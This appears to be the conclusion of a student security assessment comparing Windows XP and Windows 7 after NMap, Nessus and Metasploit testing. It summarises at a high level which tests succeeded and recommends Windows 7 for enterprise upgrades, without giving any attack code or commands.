Both systems were equally vulnerable to actual penetration. Metasploit Tests 1 & 2 were unable to start servers on either the XP or the 7 host. However, Tests 3 & 4 successfully created servers on both the Windows XP and Windows 7 machines: a server which was able to open a corrupt .wmf or image file when the link to the created server was used. This is particularly odd given that NMap and Nessus reported different open ports and vulnerabilities.

Ultimately, both operating systems have exploitable vulnerabilities, even with patching and no superfluous programs installed. The lesson is that removing end-users from the picture does not completely remove potential security issues. Only true diligence on the part of the security personnel can harden a system.

Windows XP is an industrial, no-frills operating system that was revolutionary when it was originally released in 2001. Windows 7 is a multimedia operating system aimed more at the general public than at the enterprise. Given the relative ubiquity of Moore's Law, end-users will be more familiar with Windows 7 than Windows XP in a year and a half. As such, it makes sense to begin to learn the Windows 7 platform, because it does not lack the base functionality that Windows Vista had. Windows 7 is basically Windows XP with a better user interface, better user access control, and more frills. Microsoft may have neglected to patch some of the existing holes, but they really went back to the drawing board on all the other aspects, and it should be integrated into the enterprise upgrade plan.